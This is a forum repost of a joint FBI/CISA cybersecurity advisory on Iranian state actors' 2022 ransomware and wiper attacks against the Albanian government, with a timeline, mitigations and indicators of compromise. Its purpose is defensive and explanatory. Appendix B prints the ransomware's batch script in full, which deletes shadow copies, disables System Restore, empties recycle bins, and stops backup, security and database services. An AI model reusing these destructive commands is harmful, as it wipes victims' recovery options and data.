Post by: Netwörkheäd on September 21, 2022, 06:24:11 PM
[html]Original release date: September 21, 2022
Summary
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.
In July 2022, Iranian state cyber actors—identifying as "HomeLand Justice"—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim's network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.
Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.
In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.
In September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.
Download the PDF version of this report: pdf, 1221 kb
Technical Details
Initial access
Timeframe: Approximately 14 months before encryption and wiper attacks.
Details: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.
Persistence and Lateral movement
Timeframe: Approximately several days to two months after initial compromise.
Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence. During this timeframe, the actors also used RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.
Exchange Server compromise
Timeframe: Approximately 1-6 months after initial compromise.
Details: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.
Likely Email exfiltration
Timeframe: Approximately 8 months after initial compromise.
Details: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.
VPN activity
Timeframe: Approximately 12-14 months after initial compromise.
Details: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization's Virtual Private Network (VPN) appliance. The actors' activity primarily involved two compromised accounts. The actors executed the "Advanced Port Scanner" (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.
File Cryptor (ransomware-style file encryptor)
Timeframe: Approximately 14 months after initial compromise.
Details: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.
Wiper attack
Timeframe: Approximately 14 months after initial compromise.
Details: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. Approximately over the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim's network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.
Mitigations
- Ensure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.
- Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.
- If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known exploited vulnerabilities.
- Monitor for unusually large amounts of data (i.e. several GB) being transferred from a Microsoft Exchange server.
- Check the host-based indications, including webshells, for positive hits within your environment.
Additionally, FBI and CISA recommend organizations apply the following best practices to reduce risk of compromise:
- Maintain and test an incident response plan.
- Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of known exploited vulnerabilities. Note: CISA's Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.
- Properly configure and secure internet-facing network devices.
- Do not expose management interfaces to the internet.
- Disable unused or unnecessary network ports and protocols.
- Disable/remove unused network services and devices.
- Adopt zero-trust principles and architecture, including:
- Micro-segmenting networks and functions to limit or block lateral movements.
- Enforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.
- Restricting access to trusted devices and users on the networks.
For more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran Cyber Threat Overview and Advisories.
Appendix A
Host-based IOCs
File | MD5 Hash | Notes |
Error4.aspx | 81e123351eb80e605ad73268a5653ff3 | Webshell |
cl.exe | 7b71764236f244ae971742ee1bc6b098 | Wiper |
GoXML.exe | bbe983dba3bf319621b447618548b740 | Encryptor |
Goxml.jpg | 0738242a521bdfe1f3ecc173f1726aa1 |
|
ClientBin.aspx | a9fa6cfdba41c57d8094545e9b56db36 | Webshell (reverse-proxy connections) |
Pickers.aspx | 8f766dea3afd410ebcd5df5994a3c571 | Webshell |
evaluatesiteupgrade.cs.aspx | Unknown | Webshell |
mellona.exe | 78562ba0069d4235f28efd01e3f32a82 | Propagation for Encryptor |
win.bat | 1635e1acd72809479e21b0ac5497a79b | Launches GoXml.exe on startup |
win.bat | 18e01dee14167c1cf8a58b6a648ee049 | Changes desktop background to encryption image |
bb.bat | 59a85e8ec23ef5b5c215cd5c8e5bc2ab | Saves SAM and SYSTEM hives to C:\Temp, makes cab archive |
disable_defender.exe | 60afb1e62ac61424a542b8c7b4d2cf01 | Disables Windows Defender |
rwdsk.sys | 8f6e7653807ebb57ecc549cef991d505 | Raw disk driver utilized by wiper malware |
App_Web_bckwssht.dll | e9b6ecbf0783fa9d6981bba76d949c94 |
|
Network-based IOCs
FBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):
Country | Company |
AL | KEMINET LTD. |
DE | NOOP-84-247-59-0-25 |
DE | GSL NETWORKS |
GB | LON-CLIENTS |
GB | GB-DATACENTER |
NL | NL-LAYERSWITCH-20190220 |
NL | PANQ-45-86-200-0 |
US | PRIVATE CUSTOMER |
US | BANDITO NETWORKS |
US | EXTERNAL |
US | RU-SELENA-20080725 |
US | TRANS OCEAN NETWORK |
Appendix B
Ransomware Cryptor
GoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).
If executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened documents receive an error prompt labeled, Xml Form Builder.
All internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes. If so, it will continue to decode its internal strings.
The ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.
@for /F "skip=1" %C in ('wmic LogicalDisk get DeviceID') do (@wmic /namespace:\\root\default Path SystemRestore Call disable "%C\" & @rd /s /q %C\$Recycle.bin) @vssadmin.exe delete shadows /all /quiet @set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch ccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService YooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService VeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser BackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService AcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc @for %C in (%SrvLst%) do @net stop %C @set SrvLst= @set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad @for %C in (%PrcLst%) do @taskkill /f /im "%C.exe" @set PrcLst= @exit |
The syntax error consists of a missing backslash that separates system32 and cmd.exe, so the process is launched as system32cmd.exe which is an invalid command.
The ransomware's file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4 128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64 utilizing a custom alphabet. This is appended to the end of the ransom note.
The cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.
Each encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or 1,048,576 bytes which is a hard coded limit.
Separately, the actor ran a batch script (win.bat below) to set a specific desktop background.
File Details
GoXml.exe | |
File Size: | 43.48 KB (44520 bytes) |
SHA256: | f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5 |
SHA1: | 5d117d8ef075f3f8ed1d4edcc0771a2a0886a376 |
MD5: | bbe983dba3bf319621b447618548b740 |
SSDeep: | 768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX :RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1) |
File Type: | PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
PE Header Timestamp: | 2016-04-30 17:08:19 |
ImpHash: | 5b2ce9270beea5915ec9adbcd0dbb070 |
Cert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC Cert #0 Issuer C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA Cert #0 SHA1 55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f | |
win.bat (#1, run malware) | |
File Size: | 67 bytes |
SHA256: | bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6 |
SHA1: | 14b8c155e01f25e749a9726958606b242c8624b9 |
MD5: | 1635e1acd72809479e21b0ac5497a79b |
SSDeep: | 3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1) |
File Type: | ASCII text, with no line terminators |
Contents: | start /min C:\ProgramData\Microsoft\Windows\GoXml.exe 1 2 3 4 5 6 7 |
win.bat (#2, install desktop image) | |
Filename: | ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2 |
File Size: | 765 bytes |
SHA256: | ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2 |
SHA1: | Text only | Text with Images |